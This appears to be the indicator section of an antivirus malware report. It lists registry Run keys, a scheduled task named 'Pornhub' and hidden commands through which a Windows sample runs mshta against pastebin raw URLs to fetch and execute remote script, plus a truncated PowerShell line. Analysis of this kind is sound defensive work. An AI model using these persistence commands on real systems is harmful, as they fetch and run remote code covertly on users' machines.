Technical information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'BACKup2' = '"mshta""http:\\pastebin.com\raw\wmU2hRgd"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'BACKup3' = '"mshta""http:\\pastebin.com\raw\tYkUfaZy"'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] '' = '"mshta""http:\\pastebin.com\raw\tYkUfaZy"'
- <SYSTEM32>\tasks\pornhub
- http://pa###bin.com/raw/C7a5vw9F
- DNS ASK pa###bin.com
- DNS ASK google.com
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 80 /tn "Pornhub" /tr "\"'mshta\" http:\\pastebin.com\raw\C7a5vw9F" /F' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol =...' (with hidden window)
- '%WINDIR%\syswow64\schtasks.exe' /create /sc MINUTE /mo 80 /tn "Pornhub" /tr "\"'mshta\" http:\\pastebin.com\raw\C7a5vw9F" /F
- '%WINDIR%\syswow64\mshta.exe' "http:\\pastebin.com\raw\C7a5vw9F"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$p22 = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol =...